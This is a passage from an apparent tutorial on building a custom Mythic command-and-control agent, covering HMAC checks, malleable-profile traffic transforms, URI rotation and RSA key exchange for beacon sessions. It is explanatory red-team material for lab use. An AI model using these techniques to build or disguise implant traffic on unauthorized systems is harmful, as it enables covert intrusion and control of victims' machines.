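    """Verify the trailing HMAC and return (iv, ciphertext).

    Assumed layout: IV | ciphertext | HMAC-SHA256(key, IV | ciphertext).
    """
    if len(body) < MIN_LEN:
        raise ValueError(
            f"body too short ({len(body)} bytes): likely an empty or error response"
        )
    key = base64.b64decode(key_b64)
    signed, tag = body[:-MAC_LEN], body[-MAC_LEN:]
    expected = hmac.new(key, signed, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("HMAC mismatch: wrong key or corrupted body")
    return signed[:IV_LEN], signed[IV_LEN:]


# Build a well-formed dummy body to exercise the check (not real ciphertext).
demo_key = base64.b64encode(bytes(32)).decode("ascii")
demo_iv, demo_ct = bytes(16), bytes(range(16))
demo_tag = hmac.new(bytes(32), demo_iv + demo_ct, hashlib.sha256).digest()
iv, ct = check_body(demo_iv + demo_ct + demo_tag, demo_key)
print(len(iv), len(ct))
```

A "body too short" error points at the container or profile config, while an HMAC mismatch on a full-length body points at the key or at a transform that was not reversed correctly.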
9. Profile Compatibility and EKE
Complex Malleable Profiles
Our implementation handles the full transform pipeline — xor, base64, base64url, prepend, append, netbios, netbiosu — in both directions. A profile like the Xenon apiclient.json example (message in a query parameter, multiple XOR+base64+prepend/append transforms, multi-URI rotation) works correctly because:
- The agent applies client.transforms on top of the Mythic base64 wire format before sending
- The agent reverses server.transforms after receiving to unwrap the response
- URIs are selected randomly from the uris array per request
- Message location (body, query, header, cookie) is fully implemented in _place_message
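The apply/reverse symmetry described in the list above can be sketched in a few lines. This is a simplified illustration rather than the agent's apply_transforms and reverse_transforms: it covers only xor, base64, base64url, prepend and append (no netbios variants), it assumes each transform is a dict with "action" and "value" keys, and it assumes a chain is undone by walking it in reverse order. The _sketch function names are hypothetical.

```python
import base64


def _xor(data: bytes, key: bytes) -> bytes:
    if not key:
        return data
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def apply_transforms_sketch(data: bytes, transforms: list) -> bytes:
    """Apply each transform in order."""
    for t in transforms:
        action, value = t["action"], t.get("value", "").encode("utf-8")
        if action == "base64":
            data = base64.b64encode(data)
        elif action == "base64url":
            data = base64.urlsafe_b64encode(data)
        elif action == "xor":
            data = _xor(data, value)
        elif action == "prepend":
            data = value + data
        elif action == "append":
            data = data + value
        else:
            raise ValueError(f"unsupported transform: {action!r}")
    return data


def reverse_transforms_sketch(data: bytes, transforms: list) -> bytes:
    """Undo a chain by inverting each step, last step first (assumed order)."""
    for t in reversed(transforms):
        action, value = t["action"], t.get("value", "").encode("utf-8")
        if action == "base64":
            data = base64.b64decode(data)
        elif action == "base64url":
            data = base64.urlsafe_b64decode(data)
        elif action == "xor":
            data = _xor(data, value)  # XOR is its own inverse
        elif action == "prepend":
            if not data.startswith(value):
                raise ValueError("expected prefix not found")
            data = data[len(value):]
        elif action == "append":
            if not data.endswith(value):
                raise ValueError("expected suffix not found")
            data = data[:len(data) - len(value)]
        else:
            raise ValueError(f"unsupported transform: {action!r}")
    return data


chain = [
    {"action": "xor", "value": "k3y"},
    {"action": "base64"},
    {"action": "prepend", "value": "id="},
    {"action": "append", "value": ";end"},
]
wire = b"YmIwOTM2ZmMt"
shaped = apply_transforms_sketch(wire, chain)
restored = reverse_transforms_sketch(shaped, chain)
print(shaped, restored == wire)
```

A round-trip check like this is a cheap way to test a new profile's transform chain before generating a payload with it.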
Encrypted Key Exchange
Our implementation uses RSA-based EKE per the Mythic checkin docs. When the operator selects aes256_hmac with encrypted_exchange_check = true, the agent performs a two-phase startup instead of a direct checkin:
Phase 1 — do_staging_rsa() (uses static AESPSK, outer UUID = PayloadUUID):
Agent → Mythic:
Base64( PayloadUUID + AES256(AESPSK,
{"action":"staging_rsa", "pub_key":"<b64 RSA PEM>", "session_id":"<20char>"}) )
Mythic → Agent:
Base64( PayloadUUID + AES256(AESPSK,
{"action":"staging_rsa", "uuid":"<tempUUID>",
"session_key":"<RSAPub(new_32_byte_aes_key)>",
"session_id":"<same 20char>"}) )
The agent decrypts session_key with its RSA private key (PKCS1_OAEP, SHA1, 4096-bit) to get the negotiated AES session key. This is stored as SESSION_KEY.
Phase 2 — do_checkin() (uses SESSION_KEY, outer UUID = tempUUID):
Agent → Mythic:
Base64( tempUUID + AES256(SESSION_KEY, {checkin_data}) )
Mythic → Agent:
Base64( tempUUID + AES256(SESSION_KEY,
{"action":"checkin", "id":"<callbackUUID>", "status":"success"}) )
All subsequent get_tasking and post_response messages use CALLBACK_UUID + SESSION_KEY. The static AESPSK embedded in the binary is only used during the staging exchange — an attacker who extracts the binary can only decrypt the staging messages, not the session traffic.
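With aes256_hmac and encrypted_exchange_check = false, the agent skips staging and checks in directly with PAYLOAD_UUID, using the static AESPSK for all traffic. When the operator selects none, the agent falls through to a plaintext checkin directly with PAYLOAD_UUID: no EKE, no encryption.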
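Every message in both phases shares the same outer framing, Base64(UUID + body), and only the UUID and the key change between phases. A minimal sketch of that framing, using a plaintext body so it runs without a crypto library, might look like this. wrap and unwrap are hypothetical helper names, and the 36-byte split matches the unwrapped[36:] slice in send_message.

```python
import base64
import json

UUID_LEN = 36  # canonical UUID string length, e.g. bb0936fc-b373-...


def wrap(uuid_str: str, body: bytes) -> bytes:
    """Frame a message as Base64(UUID + body)."""
    if len(uuid_str) != UUID_LEN:
        raise ValueError(f"expected a {UUID_LEN}-character UUID")
    return base64.b64encode(uuid_str.encode("utf-8") + body)


def unwrap(wire: bytes):
    """Split a framed message back into (uuid, body)."""
    raw = base64.b64decode(wire)
    if len(raw) <= UUID_LEN:
        raise ValueError("message has no body after the UUID")
    return raw[:UUID_LEN].decode("utf-8"), raw[UUID_LEN:]


payload_uuid = "bb0936fc-b373-462e-8548-52c9cd3614d6"
body = json.dumps({"action": "checkin"}).encode("utf-8")  # plaintext for the demo
wire = wrap(payload_uuid, body)
outer_uuid, inner = unwrap(wire)
print(outer_uuid, json.loads(inner))
```

In the encrypted modes the body would be the AES-256 output instead of raw JSON, but the outer UUID stays readable, which is how the server side knows which key to use for a given message.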
10. Summary of Changes: Part 1 → Part 2
| | Part 1 (http) | Part 2 (httpx) |
|---|---|---|
| Profile | http | httpx only |
| Transport (lab) | HTTP plaintext | HTTP plaintext (TLS optional) |
| Key exchange | None — plaintext | RSA EKE → per-session AES-256 key negotiated at runtime |
| Message encryption | None | AES-256-CBC + HMAC-SHA256 using negotiated session key |
| mythic_encrypts | False | True |
| Static key in binary | N/A | AESPSK used only for staging exchange, not session traffic |
| Tasks per beacon | 1 | All pending (tasking_size: -1) |
| Response round trips | Separate post_response | Piggybacked on next get_tasking |
| Request shaping | Fixed POST body | Profile-driven — URI, location, transforms from config file |
| URI rotation | Single URI | Random selection from uris array per request |
| Kill date | Not implemented | Checked before each beacon |
Continue to